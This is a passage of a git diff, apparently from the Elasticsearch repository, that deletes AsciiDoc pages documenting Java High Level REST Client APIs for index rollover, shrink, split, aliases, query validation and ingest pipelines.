ReloadAnalyzersResponse --- - -[id="{upid}-{api}"] -=== Reload Search Analyzers API - -[id="{upid}-{api}-request"] -==== Reload Search Analyzers Request - -An +{request}+ requires an `index` argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The index to reload - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Setting `IndicesOptions` controls how unavailable indices are resolved and -how wildcard expressions are expanded - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Reload Search Analyzers Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Shard statistics. Note that reloading does not happen on each shard of an -index, but once on each node the index has shards on. The reported shard count -can therefore differ from the number of index shards -<2> Reloading details of all indices the request was executed on -<3> Details can be retrieved by index name -<4> The reloaded index name -<5> The nodes the index was reloaded on -<6> The analyzer names that were reloaded diff --git a/docs/java-rest/high-level/indices/rollover.asciidoc b/docs/java-rest/high-level/indices/rollover.asciidoc deleted file mode 100644 index 6b7a82a11ae..00000000000 --- a/docs/java-rest/high-level/indices/rollover.asciidoc +++ /dev/null @@ -1,97 +0,0 @@ --- -:api: rollover-index -:request: RolloverRequest -:response: RolloverResponse --- - -[id="{upid}-{api}"] -=== Rollover Index API - -[id="{upid}-{api}-request"] -==== Rollover Request - -The Rollover Index API requires a +{request}+ instance. -A +{request}+ requires two string arguments at construction time, and -one or more conditions that determine when the index has to be rolled over: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The alias (first argument) that points to the index to rollover, and -the name of the new index in case the rollover operation is performed. -The new index argument is optional, and can be set to null -<2> Condition on the age of the index -<3> Condition on the number of documents in the index -<4> Condition on the size of the index - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-dryRun] --------------------------------------------------- -<1> Whether the rollover should be performed (default) or only simulated - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the index is opened -as a `TimeValue` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-waitForActiveShards] --------------------------------------------------- -<1> Sets the number of active shard copies to wait for before the rollover -index API returns a response -<2> Resets the number of active shard copies to wait for to the default value - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-settings] --------------------------------------------------- -<1> Add the settings to apply to the new index, which include the number of -shards to create for it - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-mapping] --------------------------------------------------- -<1> Add the mappings to associate the new index with. See <> -for examples on the different ways to provide mappings - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-alias] --------------------------------------------------- -<1> Add the aliases to associate the new index with - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Rollover Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request -<2> Indicates whether the requisite number of shard copies were started for -each shard in the index before timing out -<3> The name of the old index, eventually rolled over -<4> The name of the new index -<5> Whether the index has been rolled over -<6> Whether the operation was performed or it was a dry run -<7> The different conditions and whether they were matched or not diff --git a/docs/java-rest/high-level/indices/shrink_index.asciidoc b/docs/java-rest/high-level/indices/shrink_index.asciidoc deleted file mode 100644 index 2ec480cadd2..00000000000 --- a/docs/java-rest/high-level/indices/shrink_index.asciidoc +++ /dev/null @@ -1,79 +0,0 @@ --- -:api: shrink-index -:request: ResizeRequest -:response: ResizeResponse --- - -[id="{upid}-{api}"] -=== Shrink Index API - -[id="{upid}-{api}-request"] -==== Resize Request - -The Shrink API requires a +{request}+ instance. -A +{request}+ requires two string arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The target index (first argument) to shrink the source index (second argument) into - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the index is opened -as a `TimeValue` -<2> Timeout to wait for the all the nodes to acknowledge the index is opened -as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-waitForActiveShards] --------------------------------------------------- -<1> The number of active shard copies to wait for before the shrink index API -returns a response, as an `int` -<2> The number of active shard copies to wait for before the shrink index API -returns a response, as an `ActiveShardCount` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-settings] --------------------------------------------------- -<1> The number of shards on the target of the shrink index request -<2> Remove the allocation requirement copied from the source index - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-aliases] --------------------------------------------------- -<1> The aliases to associate the target index with - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Shrink Index Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request -<2> Indicates whether the requisite number of shard copies were started for -each shard in the index before timing out - - diff --git a/docs/java-rest/high-level/indices/simulate_index_template.asciidoc b/docs/java-rest/high-level/indices/simulate_index_template.asciidoc deleted file mode 100644 index 4dc4429ea8a..00000000000 --- a/docs/java-rest/high-level/indices/simulate_index_template.asciidoc +++ /dev/null @@ -1,39 +0,0 @@ --- -:api: simulate-index-template -:request: SimulateIndexTemplateRequest -:response: SimulateIndexTemplateResponse --- - -[id="{upid}-{api}"] -=== Simulate Index Template API - -[id="{upid}-{api}-request"] -==== Simulate Index Template Request - -A +{request}+ specifies the `indexName` to simulate matching against the -templates in the system. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The name of the index -<2> Optionally, defines a new template - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Simulate Index Template Response - -The returned +{response}+ includes a resolved `Template` object containing -the resolved settings, mappings and aliases of the index template that matched -and would be applied to the index with the provided name (if any). It will -also return a `Map` of index templates (both legacy and composable) names and their -corresponding index patterns: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Resolved template configuration that would be applied when creating the index with the provided name -<2> Overlapping index templates and their corresponding index patterns diff --git a/docs/java-rest/high-level/indices/split_index.asciidoc b/docs/java-rest/high-level/indices/split_index.asciidoc deleted file mode 100644 index c142b2ed9e1..00000000000 --- a/docs/java-rest/high-level/indices/split_index.asciidoc +++ /dev/null @@ -1,80 +0,0 @@ --- -:api: split-index -:request: ResizeRequest -:response: ResizeResponse --- - -[id="{upid}-{api}"] -=== Split Index API - -[id="{upid}-{api}-request"] -==== Resize Request - -The Split API requires a +{request}+ instance. -A +{request}+ requires two string arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The target index (first argument) to split the source index (second argument) into -<2> The resize type needs to be set to `SPLIT` - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the index is opened -as a `TimeValue` -<2> Timeout to wait for the all the nodes to acknowledge the index is opened -as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-waitForActiveShards] --------------------------------------------------- -<1> The number of active shard copies to wait for before the split index API -returns a response, as an `int` -<2> The number of active shard copies to wait for before the split index API -returns a response, as an `ActiveShardCount` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-settings] --------------------------------------------------- -<1> The settings to apply to the target index, which include the number of -shards to create for it - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-aliases] --------------------------------------------------- -<1> The aliases to associate the target index with - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Split Index Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request -<2> Indicates whether the requisite number of shard copies were started for -each shard in the index before timing out - - diff --git a/docs/java-rest/high-level/indices/templates_exist.asciidoc b/docs/java-rest/high-level/indices/templates_exist.asciidoc deleted file mode 100644 index c89627c43c1..00000000000 --- a/docs/java-rest/high-level/indices/templates_exist.asciidoc +++ /dev/null @@ -1,41 +0,0 @@ --- -:api: templates-exist -:request: IndexTemplatesExistRequest -:response: Boolean --- - -[id="{upid}-{api}"] -=== Templates Exist API - -[id="{upid}-{api}-request"] -==== Templates Exist Request - -The Templates Exist API uses +{request}+ as its request object. One or more -index template names can be provided at construction. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> A single index template name -<2> Multiple index template names -<3> An index template name using wildcard - -==== Optional arguments - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-optionals] --------------------------------------------------- -<1> If `true`, reads templates from the node's local cluster state. Otherwise -reads from the cluster state of the elected master node -<2> Timeout to connect to the master node as a `TimeValue` -<3> Timeout to connect to the master node as a `String` - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The response is a +{response}+ value, `true` if any of the request's template -names match existing templates and `false` otherwise \ No newline at end of file diff --git a/docs/java-rest/high-level/indices/unfreeze_index.asciidoc b/docs/java-rest/high-level/indices/unfreeze_index.asciidoc deleted file mode 100644 index 27e98581f0c..00000000000 --- a/docs/java-rest/high-level/indices/unfreeze_index.asciidoc +++ /dev/null @@ -1,64 +0,0 @@ --- -:api: unfreeze-index -:request: UnfreezeIndexRequest -:response: UnfreezeIndexResponse --- -[id="{upid}-{api}"] -=== Unfreeze Index API - -[id="{upid}-{api}-request"] -==== Unfreeze Index Request - -An +{request}+ requires an `index` argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The index to unfreeze - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the index is frozen -as a `TimeValue` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-waitForActiveShards] --------------------------------------------------- -<1> The number of active shard copies to wait for before the unfreeze index API -returns a response, as an `ActiveShardCount` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Setting `IndicesOptions` controls how unavailable indices are resolved and -how wildcard expressions are expanded - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Unfreeze Index Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request -<2> Indicates whether the requisite number of shard copies were started for -each shard in the index before timing out diff --git a/docs/java-rest/high-level/indices/update_aliases.asciidoc b/docs/java-rest/high-level/indices/update_aliases.asciidoc deleted file mode 100644 index 964f66d4bcd..00000000000 --- a/docs/java-rest/high-level/indices/update_aliases.asciidoc +++ /dev/null @@ -1,68 +0,0 @@ --- -:api: update-aliases -:request: IndicesAliasesRequest -:response: IndicesAliasesResponse --- - -[id="{upid}-{api}"] -=== Index Aliases API - -[id="{upid}-{api}-request"] -==== Indices Aliases Request - -The Index Aliases API allows aliasing an index with a name, with all APIs -automatically converting the alias name to the actual index name. - -An +{request}+ must have at least one `AliasActions`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Creates an `IndicesAliasesRequest` -<2> Creates an `AliasActions` that aliases index `test1` with `alias1` -<3> Adds the alias action to the request - -The following action types are supported: `add` - alias an index, `remove` - -removes the alias associated with the index, and `remove_index` - deletes the -index. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request2] --------------------------------------------------- -<1> Creates an alias `alias1` with an optional filter on field `year` -<2> Creates an alias `alias2` associated with two indices and with an optional routing -<3> Removes the associated alias `alias3` -<4> `remove_index` is just like <> - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the operation as a `TimeValue` -<2> Timeout to wait for the all the nodes to acknowledge the operation as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Indices Aliases Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request \ No newline at end of file diff --git a/docs/java-rest/high-level/indices/validate_query.asciidoc b/docs/java-rest/high-level/indices/validate_query.asciidoc deleted file mode 100644 index 920e5cf4354..00000000000 --- a/docs/java-rest/high-level/indices/validate_query.asciidoc +++ /dev/null @@ -1,83 +0,0 @@ --- -:api: indices-validate-query -:request: ValidateQueryRequest -:response: ValidateQueryResponse --- - -[id="{upid}-{api}"] -=== Validate Query API - -[id="{upid}-{api}-request"] -==== Validate Query Request - -A +{request}+ requires one or more `indices` on which the query is validated. If no index -is provided the request is executed on all indices. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The index on which to run the request. - -In addition it also needs the query that needs to be validated. The query can be built using the `QueryBuilders` utility class. -The following code snippet builds a sample boolean query. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-query] --------------------------------------------------- -<1> Build the desired query. -<2> Set it to the request. - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-explain] --------------------------------------------------- -<1> The explain parameter can be set to true to get more detailed information about why a query failed - -By default, the request is executed on a single shard only, which is randomly selected. The detailed explanation of -the query may depend on which shard is being hit, and therefore may vary from one request to another. So, in case of -query rewrite the `allShards` parameter should be used to get response from all available shards. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-allShards] --------------------------------------------------- -<1> Set the allShards parameter. - -When the query is valid, the explanation defaults to the string representation of that query. With rewrite set to true, -the explanation is more detailed showing the actual Lucene query that will be executed - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-rewrite] --------------------------------------------------- -<1> Set the rewrite parameter. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Validate Query Response - -The returned +{response}+ allows to retrieve information about the executed - operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Check if the query is valid or not. -<2> Get total number of shards. -<3> Get number of shards that were successful. -<4> Get number of shards that failed. -<5> Get the shard failures as `DefaultShardOperationFailedException`. -<6> Get the index of a failed shard. -<7> Get the shard id of a failed shard. -<8> Get the reason for shard failure. -<9> Get the detailed explanation for the shards (if explain was set to `true`). -<10> Get the index to which a particular explanation belongs. -<11> Get the shard id to which a particular explanation belongs. -<12> Get the actual explanation string. \ No newline at end of file diff --git a/docs/java-rest/high-level/ingest/delete_pipeline.asciidoc b/docs/java-rest/high-level/ingest/delete_pipeline.asciidoc deleted file mode 100644 index 3801f8a3b52..00000000000 --- a/docs/java-rest/high-level/ingest/delete_pipeline.asciidoc +++ /dev/null @@ -1,80 +0,0 @@ -[[java-rest-high-ingest-delete-pipeline]] -=== Delete Pipeline API - -[[java-rest-high-ingest-delete-pipeline-request]] -==== Delete Pipeline Request - -A `DeletePipelineRequest` requires a pipeline `id` to delete. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[delete-pipeline-request] --------------------------------------------------- -<1> The pipeline id to delete - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[delete-pipeline-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the pipeline deletion as a `TimeValue` -<2> Timeout to wait for the all the nodes to acknowledge the pipeline deletion as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[delete-pipeline-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -[[java-rest-high-ingest-delete-pipeline-sync]] -==== Synchronous Execution - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[delete-pipeline-execute] --------------------------------------------------- -<1> Execute the request and get back the response in a `WritePipelineResponse` object. - -[[java-rest-high-ingest-delete-pipeline-async]] -==== Asynchronous Execution - -The asynchronous execution of a delete pipeline request requires both the `DeletePipelineRequest` -instance and an `ActionListener` instance to be passed to the asynchronous -method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[delete-pipeline-execute-async] --------------------------------------------------- -<1> The `DeletePipelineRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `WritePipelineResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[delete-pipeline-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument - -[[java-rest-high-ingest-delete-pipeline-response]] -==== Delete Pipeline Response - -The returned `WritePipelineResponse` allows to retrieve information about the executed - operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[delete-pipeline-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request diff --git a/docs/java-rest/high-level/ingest/get_pipeline.asciidoc b/docs/java-rest/high-level/ingest/get_pipeline.asciidoc deleted file mode 100644 index 54ba545d709..00000000000 --- a/docs/java-rest/high-level/ingest/get_pipeline.asciidoc +++ /dev/null @@ -1,75 +0,0 @@ -[[java-rest-high-ingest-get-pipeline]] -=== Get Pipeline API - -[[java-rest-high-ingest-get-pipeline-request]] -==== Get Pipeline Request - -A `GetPipelineRequest` requires one or more `pipelineIds` to fetch. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[get-pipeline-request] --------------------------------------------------- -<1> The pipeline id to fetch - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[get-pipeline-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -[[java-rest-high-ingest-get-pipeline-sync]] -==== Synchronous Execution - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[get-pipeline-execute] --------------------------------------------------- -<1> Execute the request and get back the response in a GetPipelineResponse object. - -[[java-rest-high-ingest-get-pipeline-async]] -==== Asynchronous Execution - -The asynchronous execution of a get pipeline request requires both the `GetPipelineRequest` -instance and an `ActionListener` instance to be passed to the asynchronous -method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[get-pipeline-execute-async] --------------------------------------------------- -<1> The `GetPipelineRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `GetPipelineResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[get-pipeline-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument - -[[java-rest-high-ingest-get-pipeline-response]] -==== Get Pipeline Response - -The returned `GetPipelineResponse` allows to retrieve information about the executed - operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[get-pipeline-response] --------------------------------------------------- -<1> Check if a matching pipeline id was found or not. -<2> Get the list of pipelines found as a list of `PipelineConfig` objects. -<3> Get the individual configuration of each pipeline as a `Map`. diff --git a/docs/java-rest/high-level/ingest/put_pipeline.asciidoc b/docs/java-rest/high-level/ingest/put_pipeline.asciidoc deleted file mode 100644 index 12a4eb15bce..00000000000 --- a/docs/java-rest/high-level/ingest/put_pipeline.asciidoc +++ /dev/null @@ -1,83 +0,0 @@ -[[java-rest-high-ingest-put-pipeline]] -=== Put Pipeline API - -[[java-rest-high-ingest-put-pipeline-request]] -==== Put Pipeline Request - -A `PutPipelineRequest` requires an `id` argument, a source and a `XContentType`. The source consists -of a description and a list of `Processor` objects. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[put-pipeline-request] --------------------------------------------------- -<1> The pipeline id -<2> The source for the pipeline as a `ByteArray`. -<3> The XContentType for the pipeline source supplied above. - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[put-pipeline-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the pipeline creation as a `TimeValue` -<2> Timeout to wait for the all the nodes to acknowledge the pipeline creation as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[put-pipeline-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -[[java-rest-high-ingest-put-pipeline-sync]] -==== Synchronous Execution - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[put-pipeline-execute] --------------------------------------------------- -<1> Execute the request and get back the response in a WritePipelineResponse object. - -[[java-rest-high-ingest-put-pipeline-async]] -==== Asynchronous Execution - -The asynchronous execution of a put pipeline request requires both the `PutPipelineRequest` -instance and an `ActionListener` instance to be passed to the asynchronous -method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[put-pipeline-execute-async] --------------------------------------------------- -<1> The `PutPipelineRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `WritePipelineResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[put-pipeline-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument - -[[java-rest-high-ingest-put-pipeline-response]] -==== Put Pipeline Response - -The returned `WritePipelineResponse` allows to retrieve information about the executed - operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[put-pipeline-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request diff --git a/docs/java-rest/high-level/ingest/simulate_pipeline.asciidoc b/docs/java-rest/high-level/ingest/simulate_pipeline.asciidoc deleted file mode 100644 index 9d1bbd06ceb..00000000000 --- a/docs/java-rest/high-level/ingest/simulate_pipeline.asciidoc +++ /dev/null @@ -1,90 +0,0 @@ -[[java-rest-high-ingest-simulate-pipeline]] -=== Simulate Pipeline API - -[[java-rest-high-ingest-simulate-pipeline-request]] -==== Simulate Pipeline Request - -A `SimulatePipelineRequest` requires a source and a `XContentType`. The source consists -of the request body. See the https://www.elastic.co/guide/en/elasticsearch/reference/master/simulate-pipeline-api.html[docs] -for more details on the request body. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[simulate-pipeline-request] --------------------------------------------------- -<1> The request body as a `ByteArray`. -<2> The XContentType for the request body supplied above. - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[simulate-pipeline-request-pipeline-id] --------------------------------------------------- -<1> You can either specify an existing pipeline to execute against the provided documents, or supply a -pipeline definition in the body of the request. This option sets the id for an existing pipeline. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[simulate-pipeline-request-verbose] --------------------------------------------------- -<1> To see the intermediate results of each processor in the simulate request, you can add the verbose parameter -to the request. - -[[java-rest-high-ingest-simulate-pipeline-sync]] -==== Synchronous Execution - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[simulate-pipeline-execute] --------------------------------------------------- -<1> Execute the request and get back the response in a `SimulatePipelineResponse` object. - -[[java-rest-high-ingest-simulate-pipeline-async]] -==== Asynchronous Execution - -The asynchronous execution of a simulate pipeline request requires both the `SimulatePipelineRequest` -instance and an `ActionListener` instance to be passed to the asynchronous -method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[simulate-pipeline-execute-async] --------------------------------------------------- -<1> The `SimulatePipelineRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `SimulatePipelineResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[simulate-pipeline-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument - -[[java-rest-high-ingest-simulate-pipeline-response]] -==== Simulate Pipeline Response - -The returned `SimulatePipelineResponse` allows to retrieve information about the executed - operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[simulate-pipeline-response] --------------------------------------------------- -<1> Get results for each of the documents provided as instance of `List`. -<2> If the request was in verbose mode cast the response to `SimulateDocumentVerboseResult`. -<3> Check the result after each processor is applied. -<4> Get the ingest document for the result obtained in 3. -<5> Or get the failure for the result obtained in 3. -<6> Get the result as `SimulateDocumentBaseResult` if the result was not verbose. -<7> Get the ingest document for the result obtained in 6. -<8> Or get the failure for the result obtained in 6. diff 